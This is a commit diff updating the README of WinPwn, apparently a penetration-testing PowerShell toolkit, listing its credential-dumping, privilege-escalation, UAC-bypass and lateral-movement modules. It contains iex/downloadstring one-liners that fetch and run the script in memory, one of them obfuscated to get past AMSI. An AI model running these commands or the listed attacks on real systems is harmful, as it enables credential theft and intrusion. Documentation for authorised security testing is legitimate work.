Update README.md

Author: S3cur3Th1sSh1t

README.md

@@ -8,55 +8,71 @@ Any suggestions, feedback, Pull requests and comments are welcome!
 
 Just Import the Modules with:
 `Import-Module .\WinPwn.ps1` or 
-`iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')`
+`iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')`
 
 For AMSI Bypass use the following oneliner:
-`iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')`
+`iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')`
 
 
 If you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1, all scripts and executables are included.
 
 Functions available after Import:
 * #### `WinPwn` -> Menu to choose attacks:
-![alt text](https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/images/WinPwn.jpg)
+![alt text](https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/images/WinPwn.JPG)
 * #### `Inveigh` -> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integrated
 * #### `sessionGopher` -> Executes Sessiongopher Asking you for parameters
 * #### `kittielocal` ->
   * Obfuscated Invoke-Mimikatz version
   * Safetykatz in memory
   * Dump lsass using rundll32 technique
-  * Download and run Lazagne
+  * Download and run obfuscated Lazagne
   * Dump Browser credentials
-  * Extract juicy informations from memory
+  * Customized Mimikittenz Version
   * Exfiltrate Wifi-Credentials
   * Dump SAM-File NTLM Hashes
 * #### `localreconmodules` -> 
   * Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more
   * Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP
   * Checks the Powershell event logs for credentials or other sensitive informations
+  * Collect Browser Credentials and history
   * Search for passwords in the registry and on the file system
   * Find sensitive files (config files, RDP files, keepass Databases)
   * Search for .NET Binaries on the local system 
   * Optional: Get-Computerdetails (Powersploit) and PSRecon
 * #### `domainreconmodules` -> 
-  * Collect various domain informations for manual review 
+  * Collect various domain informations for manual review
   * Find AD-Passwords in description fields
   * Search for potential sensitive domain share files
   * ACLAnalysis
   * Unconstrained delegation systems/users are enumerated
   * MS17-10 Scanner for domain systems
   * Bluekeep Scanner for domain systems
   * SQL Server discovery and Auditing functions (default credentials, passwords in the database and more)
-  * MS-RPRN Check for Domaincontrollers
+  * MS-RPRN Check for Domaincontrollers or all systems
   * Group Policy Audit with Grouper2
   * An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. 
-* #### `Privescmodules` -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords)
-* #### `latmov` -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems
+* #### `Privescmodules` -> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords, dll Hijacking, File Permissions, IKEExt Check, Rotten/Juicy Potato Check)
+* #### `kernelexploits` ->
+  * MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only!
+  * MS16-032 - (2008/7/8/10/2012)!
+  * MS16-135 - (WS2k16 only)!
+  * CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
+  * CVE-2019-0841 - April 2019!
+  * CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019!
+  * CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019!
+  * CVE-2019-1215 - September 2019 - x64 only!
+  * CVE-2020-0638 - February 2020 - x64 only!
+  * Juicy-Potato Exploit
+* #### `UACBypass` ->
+  * UAC Magic, Based on James Forshaw's three part post on UAC
+  * UAC Bypass cmstp technique, by Oddvar Moe
+  * DiskCleanup UAC Bypass, by James Forshaw
+  * DccwBypassUAC technique, by Ernesto Fernandez and Thomas Vanhoutte
 * #### `shareenumeration` -> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)
 * #### `groupsearch` -> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)
 * #### `Kerberoasting` -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
 * #### `powerSQL` -> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection Attacks
-* #### `Sharphound` -> Downloads Sharphound and collects Information for the Bloodhound DB
+* #### `Sharphound` -> Bloodhound 3.0 Report
 * #### `adidnswildcard` -> Create a Active Directory-Integrated DNS Wildcard Record
 * #### `MS17-10` -> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerability
 * #### `Sharpcradle` -> Load C# Files from a remote Webserver to RAM
@@ -85,7 +101,7 @@ Functions available after Import:
 - [X] [411Hall](https://github.com/411Hall/) - JAWS
 - [X] [sense-of-security](https://github.com/sense-of-security/) - ADrecon
 - [X] [dafthack](https://github.com/dafthack/) - DomainPasswordSpray
-- [X] [rasta-mouse](https://github.com/rasta-mouse/) - Sherlock
+- [X] [rasta-mouse](https://github.com/rasta-mouse/) - Sherlock, AMsi Bypass
 - [X] [AlessandroZ](https://github.com/AlessandroZ/) - LaZagne
 - [X] [samratashok](https://github.com/samratashok/) - nishang
 - [X] [leechristensen](https://github.com/leechristensen/) - Random Repo
@@ -96,6 +112,8 @@ Functions available after Import:
 - [X] [l0ss](https://github.com/l0ss/) - Grouper2
 - [X] [dafthack](https://github.com/dafthack/) - DomainPasswordSpray
 - [X] [enjoiz](https://github.com/enjoiz/Privesc) - PrivEsc
+- [X] [James Forshaw](https://github.com/tyranid) - UACBypasses
+- [X] [Oddvar Moe](https://github.com/api0cradle) - UACBypass
 
 ## Legal disclaimer:
 Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.